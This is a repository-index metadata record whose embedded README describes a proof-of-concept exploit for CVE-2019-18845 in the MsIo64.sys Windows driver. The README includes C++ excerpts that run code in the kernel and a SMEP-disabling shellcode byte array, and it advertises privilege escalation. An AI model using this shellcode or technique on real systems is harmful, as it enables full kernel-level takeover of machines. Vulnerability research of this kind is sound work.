{"id":16551780,"url":"https://github.com/kkent030315/msioexploit","last_synced_at":"2025-03-21T10:32:09.404Z","repository":{"id":51694326,"uuid":"380591177","full_name":"kkent030315/MsIoExploit","owner":"kkent030315","description":"Exploit MsIo vulnerable driver","archived":false,"fork":false,"pushed_at":"2021-08-12T00:06:19.000Z","size":635,"stargazers_count":93,"open_issues_count":2,"forks_count":36,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-03-18T00:37:37.628Z","etag":null,"topics":["cve-2019-18845","kernel","kernel-exploit","kernel-exploits","windows"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kkent030315.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-06-26T20:31:03.000Z","updated_at":"2025-03-13T12:56:32.000Z","dependencies_parsed_at":"2022-08-03T09:15:12.137Z","dependency_job_id":null,"html_url":"https://github.com/kkent030315/MsIoExploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kkent030315","download_url":"https://codeload.github.com/kkent030315/MsIoExploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244777991,"owners_count":20508826,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2019-18845","kernel","kernel-exploit","kernel-exploits","windows"],"created_at":"2024-10-11T19:43:08.615Z","updated_at":"2025-03-21T10:32:09.055Z","avatar_url":"https://github.com/kkent030315.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src=\"image.gif\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://img.shields.io/github/workflow/status/kkent030315/MsIoExploit/MSBuild?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/codacy/grade/80af226b06214213bc3d2a44c9624222?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/license/kkent030315/MsIoExploit?style=for-the-badge\"\u003e\n\u003c/p\u003e\n\n# MsIoExploit\n\nExploit MsIo vulnerable driver\n\n# Description\n\nThis is a PoC for [CVE-2019-18845](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18845) `MsIo64.sys` allowing non-privileged user to map/unmap arbitrary physical memory via `ZwMapViewOfSection` / `ZwUnmapViweOfSection`.\nIf you are interested in abusing physical memory mapping, see [project anycall](https://github.com/kkent030315/anycall/tree/main/anycall) has full implementation of client and driver-sided functionalities.\n\nAllowing non-privileged(non-kernel) component to map arbitrary physical memory is the most *bad* practice and critically vulnerable way which allowing attacker to gain full control of the system as I demonstrated arbitrary NT-Kernel API invocation in this PoC.\n\nYou can try by yourself by executing this while you have driver running.\n\nAlso this driver and `MsIo64.dll` are fully copy \u0026 paste of [IO-Memory](https://github.com/Bleichroder/IO-Memory).\n\nThis exploit was first reported 2019 but still remains unfixed and hardware vendors like ASRock still use this driver.\n\n### Features\n\n- Privilege Escalation\n- Shellcode Execution\n- Arbitrary code execution in CPL0 context\n  - `__writemsr`, `__cpuid` or whatever\n\nI've implemented a replicate of Capcom exploit so you can execute any code in CPL0 context, as follows:\n\n```cpp\nunsigned long long cr4 = 0;\nstatic auto ntoskrnl_image_base = this-\u003entoskrnl_image_base;\nstatic uint16_t dos_signature = 0x0;\n\nthis-\u003edisable_smep(\u0026cr4);\n// lambda will be called in the CPL0\nthis-\u003eexec_in_kernel([]() -\u003e void\n    {\n        // direct access to the kernel virtual memory\n        dos_signature = *(uint16_t*)(ntoskrnl_image_base);\n    });\nthis-\u003eenable_smep(\u0026cr4);\n```\n\nPlease note that the lambda function cannot be captured because captured lambda functions cannot be a function pointer. so only `static` members can access from inside of the lambda. also in the context of CPL0 it is impossible to call a few specific functions like `printf` will cause BSOD of course.\n\nShellcode execution will be look like:\n\n```cpp\nvoid exploit::disable_smep(unsigned long long* old_cr4)\n{\n    static uint8_t disable_smep_shellcode[] = {\n        0xFA,                               // cli\n        0x0F, 0x20, 0xE0,                   // mov rax, cr4\n        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax\n        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff\n        0x0F, 0x22, 0xE0,                   // mov cr4, rax\n        0xC3 };                             // ret\n\n    this-\u003eexecute_shellcode_in_kernel\u003cfn_disable_smep_t\u003e(\n        reinterpret_cast\u003cuint8_t*\u003e(\u0026disable_smep_shellcode),\n        sizeof(disable_smep_shellcode),\n        old_cr4);\n}\n```\n\nNow we have a full control out of the system, no need to do dumbass thing like mapping unsigned drivers.\n\n# Usage\n\n```bash\n\u003e MsIoExploit.exe\n```\n\n# Credit\n\nSeveral sources regarding token steal are from [ExploitCapcom](https://github.com/tandasat/ExploitCapcom)\n\nCredit [@tandasat](https://github.com/tandasat/)\n\n# License\n\nMIT copyright Kento Oki \\\u003chrn832@protonmail.com\\\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fmsioexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkkent030315%2Fmsioexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fmsioexploit/lists"}